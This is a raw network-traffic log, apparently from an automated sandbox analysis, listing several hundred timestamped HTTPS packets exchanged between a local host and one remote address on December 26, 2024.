                                                                                                                                                                              Dec 26, 2024 18:26:53.669054031 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.669073105 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.669127941 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.669136047 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.669181108 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.825329065 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.825350046 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.825429916 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.825450897 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.825503111 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.832613945 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.832631111 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.832711935 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.832719088 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.832768917 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.839812994 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.839828014 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.839894056 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.839899063 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.839946985 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.843717098 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.843760967 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.843795061 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.843801022 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.843843937 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.849961042 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.849977970 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.850040913 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.850048065 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.850096941 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.857592106 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.857605934 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.857665062 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.857670069 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.857718945 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.863842964 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.863859892 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.863925934 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.863930941 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.863975048 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.874859095 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.874874115 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.874955893 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.874960899 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.875005007 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.033859015 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.033917904 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.033973932 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.033987045 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.034001112 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.034030914 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.040724039 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.040772915 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.040818930 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.040824890 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.040858030 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.040879965 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.046905994 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.046948910 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.046983957 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.046988010 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.047020912 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.047043085 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.054373026 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.054414988 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.054456949 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.054461002 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.054492950 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.054502964 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.061383963 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.061424017 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.061463118 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.061466932 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.061501980 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.061520100 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.067928076 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.067970037 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.068013906 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.068017960 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.068030119 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.068057060 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.075172901 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.075212955 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.075251102 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.075254917 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.075285912 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.075315952 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.085452080 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.085494041 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.085525990 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.085530043 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.085556984 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.085576057 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.244795084 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.244837046 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.244888067 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.244895935 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.244946003 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.251828909 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.251869917 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.251919031 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.251924038 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.251936913 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.251971006 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.258078098 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.258119106 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.258156061 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.258160114 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.258186102 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.258208036 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.265208006 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.265249968 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.265286922 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.265290976 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.265321016 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.265338898 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.272588015 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.272644043 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.272670031 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.272674084 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.272711039 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.272722960 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.279025078 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.279067039 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.279154062 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.279160023 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.279212952 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.286231041 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.286274910 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.286318064 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.286322117 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.286355972 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.286370993 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.295861959 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.295906067 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.295952082 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.295955896 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.295984983 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.296005011 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.454982042 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.455030918 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.455089092 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.455095053 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.455132008 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.455148935 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.462157965 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.462218046 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.462249041 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.462253094 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.462287903 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.462302923 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.468451977 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.468492985 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.468523026 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.468527079 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.468549967 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.468568087 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.475495100 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.475528002 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.475570917 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.475575924 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.475594044 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.475620985 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.482635975 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.482651949 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.482738018 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.482743979 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.482786894 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.489375114 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.489391088 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.489440918 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.489445925 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.489486933 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.496587992 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.496603966 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.496665001 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.496670008 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.496721029 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.506280899 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.506298065 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.506352901 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.506356955 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.506397963 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.665384054 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.665400028 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.665499926 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.665508032 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.665556908 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.672455072 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.672472000 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.672529936 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.672533989 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.672583103 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.679568052 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.679585934 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.679662943 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.679668903 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.679728985 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.685894966 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.685910940 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.685977936 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.685982943 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.686029911 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.692912102 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.692926884 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.692982912 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.692989111 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.693032026 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.699704885 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.699719906 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.699774981 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.699779987 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.699821949 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.706772089 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.706787109 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.706831932 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.706836939 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.706882000 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.716989040 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.717055082 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.717057943 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.717066050 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.717113018 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.875946045 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.875962973 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.876023054 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.876030922 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.876075029 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.883200884 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.883215904 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.883276939 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.883281946 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.883363962 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.890217066 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.890232086 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.890364885 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.890369892 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.890428066 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.897367954 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.897382975 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.897440910 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.897445917 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.897494078 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.903704882 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.903719902 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.903793097 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.903798103 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.903837919 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.910284042 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.910299063 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.910378933 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.910383940 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.910425901 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.917419910 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.917435884 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.917510033 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.917515039 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.917552948 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.927638054 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.927654028 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.927759886 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:54.927764893 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:54.927808046 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.086920023 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.086935997 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.087004900 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.087012053 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.087074995 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.092052937 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.092092991 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.092113972 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.092118979 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.092147112 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.099040031 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.099055052 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.099117994 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.099123955 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.106216908 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.106231928 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.106291056 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.106297970 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.112565994 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.112580061 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.112637043 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.112642050 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.119157076 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.119170904 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.119225025 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.119231939 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.126282930 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.126296043 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.126354933 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.126360893 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.133505106 CET44349719172.67.214.186192.168.2.16
